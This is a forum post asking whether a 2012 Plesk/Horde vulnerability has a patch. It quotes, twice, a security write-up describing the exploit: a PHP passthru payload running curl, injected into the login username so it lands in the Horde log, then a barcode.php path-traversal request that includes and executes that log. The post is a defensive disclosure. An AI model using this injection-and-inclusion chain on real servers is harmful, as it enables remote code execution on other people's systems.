Facebook
TwitterA Parallels Plesk vulnerability in Horde has been published on Aug. 11, 2012 at:
http://bot24.blogspot.it/2012/08/plesk-exploit-readable-logfile.html
There seems no patch or microupdate dealing with the new alledged problem in Plesk as of Aug. 23.
Something similar was reported much earlier at:
http://cxsecurity.com/issue/WLB-2011020052
but this exploit appears to be something new.
Can someone confirm this problem with the latest versions of PLesk 11 and/or whetehr Parallels is dealing with this issue?
Thanks
read below:
----- cut here ----------
" Last update: Tuesday, August 21, 2012
We recently noticed a high level of vulnerability scans looking for instances of Plesk and. We monitored this activity closely and discovered an exploit taking advantage of a readable Horde logfile.
Here is the anatomy of the exploit:
A bogus request is made to the Horde login page with the malicious code in the username. This generates a log entry like the following in /var/log/psa-horde/psa-horde.log:
Feb 16 21:47:11 HORDE [error] [imp] FAILED LOGIN xx.xxx.x.xxx to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://google.com/ > /tmp/test.txt"); ?>@cip.test [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
A request is then made to the barcode.php page (which calls /usr/share/psa-horde/lib/Horde/Image.php) to execute the commands written to the Horde log:
xx.xxx.x.xxx - - [16/Feb/2012:21:47.16 -0600] "GET /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log HTTP/1.1" 200 170 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
If the exploit is successful the hacker then begins uploading malicious files to the server. These malicious files then send out bogus UDP data over port 7. (source: Rackspace)
If you are using Plesk make certain you are keeping your security patches up to date and consider limiting access to certain system resources by IP.
credit: Country IP Blocks"
--------- end cut ----------
http://bot24.blogspot.it/2012/08/plesk-exploit-readable-logfile.html
There seems no patch or microupdate dealing with the new alledged problem in Plesk as of Aug. 23.
Something similar was reported much earlier at:
http://cxsecurity.com/issue/WLB-2011020052
but this exploit appears to be something new.
Can someone confirm this problem with the latest versions of PLesk 11 and/or whetehr Parallels is dealing with this issue?
Thanks
read below:
----- cut here ----------
" Last update: Tuesday, August 21, 2012
We recently noticed a high level of vulnerability scans looking for instances of Plesk and. We monitored this activity closely and discovered an exploit taking advantage of a readable Horde logfile.
Here is the anatomy of the exploit:
A bogus request is made to the Horde login page with the malicious code in the username. This generates a log entry like the following in /var/log/psa-horde/psa-horde.log:
Feb 16 21:47:11 HORDE [error] [imp] FAILED LOGIN xx.xxx.x.xxx to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://google.com/ > /tmp/test.txt"); ?>@cip.test [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
A request is then made to the barcode.php page (which calls /usr/share/psa-horde/lib/Horde/Image.php) to execute the commands written to the Horde log:
xx.xxx.x.xxx - - [16/Feb/2012:21:47.16 -0600] "GET /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log HTTP/1.1" 200 170 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
If the exploit is successful the hacker then begins uploading malicious files to the server. These malicious files then send out bogus UDP data over port 7. (source: Rackspace)
If you are using Plesk make certain you are keeping your security patches up to date and consider limiting access to certain system resources by IP.
credit: Country IP Blocks"
--------- end cut ----------
